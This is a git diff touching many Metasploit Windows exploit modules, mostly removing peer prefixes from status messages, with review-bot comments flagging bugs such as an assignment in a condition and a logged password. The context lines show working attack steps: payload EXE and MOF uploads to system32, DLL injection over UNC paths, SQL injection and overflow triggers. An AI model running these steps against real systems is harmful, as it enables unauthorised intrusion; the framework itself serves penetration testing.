send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index 5bd2bfab84..4638454fcb 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote php_fname = Rex::Text.rand_text_alpha(5) + ".php" rnd_txt = Rex::Text.rand_text_alpha_upper(3) - print_status("#{peer} - Sending SQL injection...") + print_status("Sending SQL injection...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', 
@@ -88,10 +88,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.body !~ /No Results Found/ - print_error("#{peer} - I don't think the SQL Injection attempt worked") + print_error("I don't think the SQL Injection attempt worked") return elsif not res - print_error("#{peer} - No response from the server") + print_error("No response from the server") return end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status(res.to_s) target_path = "#{File.dirname(target_uri.path)}/#{php_fname}" - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler diff --git a/modules/exploits/windows/http/trackit_file_upload.rb b/modules/exploits/windows/http/trackit_file_upload.rb index da07199b52..1d33984b1e 100644 --- a/modules/exploits/windows/http/trackit_file_upload.rb +++ b/modules/exploits/windows/http/trackit_file_upload.rb @@ -499,7 +499,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' @@ -507,7 +507,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 500 - print_error("#{peer} - Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) + print_error("Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) # try again but now use ASPX instead of ASP or vice-versa if @version == 9 file_content = Msf::Util::EXE.to_exe_aspx(exe) 
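Review bot: Both arms of the ternary on the changed line in the `@@ -507,7 +507,7 @@` hunk are the same string, so the message always says ASPX whatever `@version` is. Going by the comment below it and the `@version == 9` branch that calls `to_exe_aspx`, the else arm was presumably meant to be ASP: `(@version == 9 ? "ASPX" : "ASP")`. The retry block continues outside the hunk, so this should be confirmed against its else branch.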
@@ -521,7 +521,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 490f35f88d..683baf2a5c 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote begin aspx = @upload_random + '.aspx' - print_status("#{peer} - Searching: #{aspx}") + print_status("Searching: #{aspx}") files = cli.fs.file.search("\\", aspx) if not files or files.empty? print_error("Unable to find #{aspx}. Please manually remove it.") @@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote end files.each { |f| - print_warning("#{peer} - Deleting: #{f['path'] + "\\" + f['name']}") + print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{aspx} deleted") + print_good("#{aspx} deleted") rescue ::Exception => e print_error("Unable to delete #{aspx}: #{e.message}") end @@ -121,8 +121,8 @@ class Metasploit3 < Msf::Exploit::Remote # attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Uploading #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Uploading to #{uri_path}#{@upload_random}.aspx") + print_status("Uploading #{aspx.length} bytes through #{attack_url}...") + print_status("Uploading to #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, 
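Review bot: The cleanup block in the `@@ -79,10 +79,10 @@` hunk ends in `rescue ::Exception => e`, which also traps `Interrupt` and `SystemExit`, so an operator interrupt during the file search is reported as a deletion failure instead of stopping the run. `rescue ::StandardError => e` should still cover ordinary failures of the search and delete calls. The `@@ -85,10 +85,10 @@` hunk of vmware_vcenter_chargeback_upload.rb uses the same rescue. The `begin` it belongs to opens in the previous hunk.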
@@ -135,11 +135,11 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") + print_status("Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") end # @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote # upload_path = uri_path + "#{@upload_random}.aspx" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -155,12 +155,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code > 302) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -183,8 +183,8 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Writing #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Wrting over #{uri_path}#{@upload_random}.aspx") + print_status("Writing #{aspx.length} bytes through #{attack_url}...") + print_status("Wrting over #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, 
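Review bot: `elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/)` in the `@@ -135,11 +135,11 @@` hunk assigns 500 to `res.code` instead of comparing it. The branch therefore depends only on the body match, and the status interpolated into both following messages has already been overwritten with 500. The condition should start `elsif (res.code == 500 and ...`. The same assignment is in the `@@ -197,12 +197,12 @@` hunk of this file.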
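Review bot: The new message in the `@@ -183,8 +183,8 @@` hunk still carries the typo "Wrting", while the line above it spells the word correctly. Since the line is being touched anyway it could become `print_status("Writing over #{uri_path}#{@upload_random}.aspx")`.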
@@ -197,12 +197,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") + print_status("Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") end handler end diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb index 2466bffdee..0a8a6421b9 100644 --- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb +++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb @@ -67,17 +67,17 @@ class Metasploit3 < Msf::Exploit::Remote end if cli.type != 'meterpreter' - print_error("#{peer} - Meterpreter not used. Please manually remove #{@dropper}") + print_error("Meterpreter not used. Please manually remove #{@dropper}") return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_status("#{peer} - Searching: #{@dropper}") + print_status("Searching: #{@dropper}") files = cli.fs.file.search("\\", @dropper) if not files or files.empty? - print_error("#{peer} - Unable to find #{@dropper}. Please manually remove it.") + print_error("Unable to find #{@dropper}. Please manually remove it.") return end 
@@ -85,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{@dropper} deleted") + print_good("#{@dropper} deleted") return rescue ::Exception => e - print_error("#{peer} - Unable to delete #{@dropper}: #{e.message}") + print_error("Unable to delete #{@dropper}: #{e.message}") end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha(8) + ".exe" @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri("cbmui", "images", dropper_filename), diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index c064c4be86..e20af52a2a 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb 
@@ -96,26 +96,26 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}") end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") register_file_for_cleanup(exe_name) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}") end diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index b8fc3c811f..3626d62b2c 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb 
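Review bot: In the `@@ -96,26 +96,26 @@` hunk the failure branch after the MOF upload still tests `res =~ /#{exe_name}/`, which looks copied from the EXE branch above it. If the server reply names the file that failed, the DEPTH hint will not be printed for a MOF failure. The check presumably should use `mof_name`, e.g. `res =~ /#{Regexp.escape(mof_name)}/`. The `fileid: (\d+)` pattern also captures a group that none of the visible lines read.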
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = generate_payload_dll print_status("File available on #{unc}...") - print_status("#{peer} - Trying to execute remote DLL...") + print_status("Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb index cfa69e5d2f..5c85510fb9 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") exec_bar(datastore['CMDPATH'], command, "\x00") end end diff --git a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb index b43d9af842..a61d414c6c 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb 
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -92,11 +92,11 @@ class Metasploit3 < Msf::Exploit::Remote mof = generate_mof(mof_name, vbs_name) # We can't upload binary contents, so embedding the exe into a VBS. - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") + print_status("Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") upload_file("windows\\system32\\#{vbs_name}", vbs) register_file_for_cleanup(vbs_name) - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") + print_status("Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") end diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 25e196293b..67a59e7911 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -134,10 +134,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end 
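Review bot: The context line `peer = "#{rhost}:#{rport}"` in the `@@ -134,10 +134,10 @@` hunk has no reader left among the visible print calls, because the change drops every `#{peer}` interpolation from them. If nothing later in the method uses it, the assignment can be removed; if a later call still interpolates it, a short comment saying so would help. The same local is set in the `@@ -136,10 +136,10 @@` hunk of hp_operations_agent_coda_8c.rb and the `@@ -246,7 +246,7 @@` hunk of ibm_director_cim_dllinject.rb. The method body continues outside the hunk.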
@@ -157,11 +157,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end @@ -197,7 +197,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index f38eeb33a9..d9e85a05f9 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -136,10 +136,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end @@ -159,11 +159,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end @@ -199,7 +199,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect 
diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index b9be472306..b8b84e1f1c 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -246,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote def check peer = "#{rhost}:#{rport}" - print_status("#{peer} - Checking if CIMListener exists...") + print_status("Checking if CIMListener exists...") res = send_request_cgi({ 'uri' => "/CIMListener/", @@ -286,7 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll") - print_status("#{peer} - Injecting DLL...") + print_status("Injecting DLL...") res = send_request_cgi({ 'uri' => "/CIMListener/#{exploit_unc}#{share_name}\\#{basename}.dll", @@ -302,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /CIMVERSION/ - print_status"#{peer} - Then injection seemed to work..." + print_status"Then injection seemed to work..." else fail_with(Failure::Unknown, "#{peer} - Unexpected response") end diff --git a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb index ad3de555e3..1d451f3d3d 100644 --- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb +++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer") + vprint_status("Trying to detect ManageEngine EventLog Analyzer") res = send_request_cgi({ 'method' => 'GET', 
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Retrieving JSESSION ID") + print_status("Retrieving JSESSION ID") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'event', 'index3.do'), @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/ jsessionid = $1 - print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]") + print_status("JSESSION ID Retrieved [ #{jsessionid} ]") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!") end - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"), @@ -143,14 +143,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET' @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/ cookies = res.get_cookies - print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]") + print_status("Logged in, new cookies retrieved [#{cookies}]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!") end 
@@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}") - print_status("#{peer} - Executing JSP payload") + print_status("Executing JSP payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, jsp_name), diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index 5c46c811ed..c61e866b07 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alpha(rand(10)+5) + '.txt' contents = rand_text_alpha(rand(10)+5) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}") + print_status("Sending HTTP ConvertFile Request to upload the test file #{filename}") res = upload_file(filename, contents) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ 
@@ -127,21 +127,21 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{exe_name}") + print_error("Failed to upload #{exe_name}") return end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{mof_name}") + print_error("Failed to upload #{mof_name}") return end diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb index 9641fcacc5..0b08956557 100644 --- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb +++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb 
@@ -136,12 +136,12 @@ class Metasploit3 < Msf::Exploit::Remote pkt << diagheader pkt << user_connect pkt << support_data - print_status("#{peer} - Sending initialize packet to the SAP Dispatcher") + print_status("Sending initialize packet to the SAP Dispatcher") sock.put(pkt) res = sock.get_once(-1) if not res - print_error("#{peer} - The connection with the Dispatcher has not been initialized") + print_error("The connection with the Dispatcher has not been initialized") return end @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote crash << payload.encoded end - print_status("#{peer} - Sending crafted message") + print_status("Sending crafted message") message = "\x10\x06\x20" + [crash.length].pack("n") + crash diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" diff --git a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb index b2a11ea670..c929b1db48 100644 --- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb +++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb @@ -81,13 +81,13 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once disconnect if !res - vprint_error "#{peer} - Connection failed." + vprint_error "Connection failed." Exploit::CheckCode::Unknown elsif res == "\x00\x00\x00\x00" - vprint_status "#{peer} - Received reply (#{res.length} bytes)" + vprint_status "Received reply (#{res.length} bytes)" Exploit::CheckCode::Detected else - vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + vprint_warning "Unexpected reply (#{res.length} bytes)" Exploit::CheckCode::Safe end end 
@@ -115,9 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::Unknown, "#{peer} - Connection failed.") elsif res == "\x00\x00\x00\x00" - print_status "#{peer} - Received reply (#{res.length} bytes)" + print_status "Received reply (#{res.length} bytes)" else - print_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + print_warning "Unexpected reply (#{res.length} bytes)" end end @@ -129,15 +129,15 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe" if target.name =~ /Automatic/ or target.name =~ /Vista/ - print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)") + print_status("Writing EXE to startup for all users (#{exe.length} bytes)") upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe) end if target.name =~ /Automatic/ or target.name =~ /XP/ - print_status("#{peer} - Sending EXE (#{exe.length} bytes)") + print_status("Sending EXE (#{exe.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe) mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length} bytes)") + print_status("Sending MOF (#{mof.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}") end diff --git a/modules/exploits/windows/mysql/mysql_mof.rb b/modules/exploits/windows/mysql/mysql_mof.rb index f0147cad1f..9c292c9619 100644 --- a/modules/exploits/windows/mysql/mysql_mof.rb +++ b/modules/exploits/windows/mysql/mysql_mof.rb 
@@ -92,17 +92,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) return if not m rescue RbMysql::AccessDeniedError - print_error("#{peer} - Access denied.") + print_error("Access denied.") return end if not is_windows? - print_error("#{peer} - Remote host isn't Windows.") + print_error("Remote host isn't Windows.") return end @@ -110,24 +110,24 @@ class Metasploit3 < Msf::Exploit::Remote exe_name = Rex::Text::rand_text_alpha(5) + ".exe" dest = "#{drive}:/windows/system32/#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) register_file_for_cleanup("#{exe_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. I blame kc :-)") + print_error("No permission to write. I blame kc :-)") return end mof_name = Rex::Text::rand_text_alpha(5) + ".mof" dest = "#{drive}:/windows/system32/wbem/mof/#{mof_name}" mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(mof, dest) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. Bail!") + print_error("No permission to write. Bail!") return end end diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 29a09fcac5..5628daeca3 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb 
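Review bot: The status line at the top of `exploit` in mysql_mof.rb still interpolates `datastore['PASSWORD']`, so the cleartext password is written to the console and to any spooled or shared log of the run. The same line appears in the `-102,7` hunk of mysql_start_up.rb. Since this commit already touches both lines, I would log the account name only: `print_status("Attempting to login as '#{datastore['USERNAME']}'")`. If the password is needed for troubleshooting, a `vprint_status` line would keep it out of default output.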
